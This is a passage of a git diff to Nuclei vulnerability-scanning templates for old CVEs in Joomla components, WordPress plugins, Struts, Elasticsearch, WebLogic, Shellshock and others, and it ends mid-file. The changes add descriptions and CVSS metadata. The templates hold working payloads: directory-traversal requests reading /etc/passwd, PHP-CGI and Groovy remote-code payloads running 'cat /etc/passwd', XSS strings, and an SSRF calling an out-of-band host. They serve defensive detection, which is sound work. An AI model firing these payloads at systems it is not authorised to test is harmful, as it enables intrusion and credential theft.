name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12285
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1956
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1957
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12235
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1957
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-2034
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/34003
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2034
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-2037
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/34005
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2037
|
||||||
|
tags: cve,cve2010,lfi,joomla
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-2920
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12120
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2920
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2011-2780
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Chyrp 2.x - Local File Inclusion (LFI)
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
tags: cve,cve2011,lfi,chyrp
|
||||||
|
description: "Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744."
|
||||||
|
reference:
|
||||||
|
- http://www.justanotherhacker.com/advisories/JAHx113.txt
|
||||||
|
- http://www.openwall.com/lists/oss-security/2011/07/13/5
|
||||||
|
- http://www.ocert.org/advisories/ocert-2011-001.html
|
||||||
|
- http://www.openwall.com/lists/oss-security/2011/07/13/6
|
||||||
|
- http://www.securityfocus.com/bid/48672
|
||||||
|
- http://secunia.com/advisories/45184
|
||||||
|
- http://osvdb.org/73891
|
||||||
|
- http://securityreason.com/securityalert/8312
|
||||||
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/68565
|
||||||
|
- http://www.securityfocus.com/archive/1/518890/100/0/threaded
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -10,6 +10,11 @@ info:
|
||||||
- https://www.securityfocus.com/bid/48806/info
|
- https://www.securityfocus.com/bid/48806/info
|
||||||
- https://seclists.org/bugtraq/2011/Nov/140
|
- https://seclists.org/bugtraq/2011/Nov/140
|
||||||
tags: cve,cve2011,xss,tikiwiki
|
tags: cve,cve2011,xss,tikiwiki
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2011-4336
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -16,9 +16,7 @@ requests:
|
||||||
- |
|
- |
|
||||||
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
|
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Content-Length: 31
|
|
||||||
|
|
||||||
<?php echo shell_exec("cat /etc/passwd"); ?>
|
<?php echo shell_exec("cat /etc/passwd"); ?>
|
||||||
|
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
|
||||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||||
|
description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
|
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
|
||||||
author: exploitation,dwisiswant0,alex
|
author: exploitation,dwisiswant0,alex
|
||||||
severity: critical
|
severity: critical
|
||||||
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized. Since said information will be evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
||||||
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
|
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
|
||||||
tags: cve,cve2013,rce,struts,apache
|
tags: cve,cve2013,rce,struts,apache
|
||||||
|
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
|
||||||
tags: cve,cve2013,wordpress,xss,wp-plugin
|
tags: cve,cve2013,wordpress,xss,wp-plugin
|
||||||
|
description: "Multiple cross-site scripting (XSS) vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
|
||||||
tags: cve,cve2013,wordpress,xss,wp-plugin
|
tags: cve,cve2013,wordpress,xss,wp-plugin
|
||||||
|
description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
author: geeknik
|
author: geeknik
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: cve,cve2014,sqli,lighttpd
|
tags: cve,cve2014,sqli,lighttpd
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2014-2323
|
||||||
|
cwe-id: CWE-89
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -18,10 +18,7 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
Accept-Language: en
|
||||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
|
||||||
Connection: close
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Content-Length: 343
|
|
||||||
|
|
||||||
{
|
{
|
||||||
"size": 1,
|
"size": 1,
|
||||||
|
|
|
@ -9,6 +9,11 @@ info:
|
||||||
- https://snyk.io/vuln/npm:st:20140206
|
- https://snyk.io/vuln/npm:st:20140206
|
||||||
severity: high
|
severity: high
|
||||||
tags: cve,cve2014,lfi,nodejs,st
|
tags: cve,cve2014,lfi,nodejs,st
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2014-3744
|
||||||
|
cwe-id: CWE-22
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,15 +4,16 @@ info:
|
||||||
name: Weblogic SSRF in SearchPublicRegistries.jsp
|
name: Weblogic SSRF in SearchPublicRegistries.jsp
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: cve,cve2014,weblogic,oracle,ssrf
|
tags: cve,cve2014,weblogic,oracle,ssrf,oob
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
|
||||||
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
|
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
|
||||||
|
description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700"
|
- "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -21,9 +22,6 @@ requests:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "Connection refused"
|
- "http"
|
||||||
- "Socket Closed"
|
|
||||||
- "content-type: unknown/unknown"
|
|
||||||
part: body
|
|
||||||
condition: or
|
|
||||||
|
|
|
@ -8,6 +8,12 @@ info:
|
||||||
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
|
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
|
||||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2014-4535
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -8,6 +8,12 @@ info:
|
||||||
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
|
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
|
||||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2014-4536
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -3,13 +3,18 @@ id: CVE-2014-6271
|
||||||
info:
|
info:
|
||||||
name: Shellshock
|
name: Shellshock
|
||||||
author: pentest_swissky
|
author: pentest_swissky
|
||||||
severity: high
|
severity: critical
|
||||||
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
|
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
|
||||||
reference:
|
reference:
|
||||||
- http://www.kb.cert.org/vuls/id/252743
|
- http://www.kb.cert.org/vuls/id/252743
|
||||||
- http://www.us-cert.gov/ncas/alerts/TA14-268A
|
- http://www.us-cert.gov/ncas/alerts/TA14-268A
|
||||||
tags: cve,cve2014,rce
|
tags: cve,cve2014,rce
|
||||||
|
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2014-6271
|
||||||
|
cwe-id: CWE-78
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
|
reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
|
||||||
tags: cve,cve2014,lfi
|
tags: cve,cve2014,lfi
|
||||||
|
description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
|
||||||
tags: cve,2014,wordpress,xss,wp-plugin
|
tags: cve,2014,wordpress,xss,wp-plugin
|
||||||
|
description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2014-9444
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-9444
|
||||||
|
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '</script><script>alert(document.domain)</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -8,6 +8,12 @@ info:
|
||||||
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2015-1000012
|
||||||
|
cwe-id: CWE-200
|
||||||
|
description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -17,10 +17,7 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
Accept-Language: en
|
||||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
|
||||||
Connection: close
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Content-Length: 343
|
|
||||||
|
|
||||||
{
|
{
|
||||||
"name": "test"
|
"name": "test"
|
||||||
|
@ -29,11 +26,7 @@ requests:
|
||||||
POST /_search HTTP/1.1
|
POST /_search HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
|
||||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
|
||||||
Connection: close
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Content-Length: 343
|
|
||||||
|
|
||||||
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}
|
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,7 @@ id: CVE-2015-2080
|
||||||
info:
|
info:
|
||||||
name: Eclipse Jetty Remote Leakage
|
name: Eclipse Jetty Remote Leakage
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: high
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
|
- https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
|
||||||
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
|
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
|
||||||
|
@ -11,6 +11,11 @@ info:
|
||||||
description: |
|
description: |
|
||||||
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
|
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
|
||||||
tags: cve,cve2015,jetty
|
tags: cve,cve2015,jetty
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2015-2080
|
||||||
|
cwe-id: CWE-200
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
|
|
|
@ -8,6 +8,7 @@ info:
|
||||||
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
|
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||||
|
description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -8,6 +8,11 @@ info:
|
||||||
Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
|
Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544
|
||||||
tags: cve,cve2015,xss,itop
|
tags: cve,cve2015,xss,itop
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2015-6544
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -9,7 +9,12 @@ info:
|
||||||
- https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
|
- https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
|
||||||
- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
|
- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-7450
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-7450
|
||||||
tags: cve,cve2015,websphere,deserialization,rce
|
tags: cve,cve2015,websphere,deserialization,rce,oob
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2015-7450
|
||||||
|
cwe-id: CWE-94
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -27,7 +32,7 @@ requests:
|
||||||
<ns1:invoke xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
|
<ns1:invoke xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
|
||||||
<objectname xsi:type="ns1:javax.management.ObjectName">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>
|
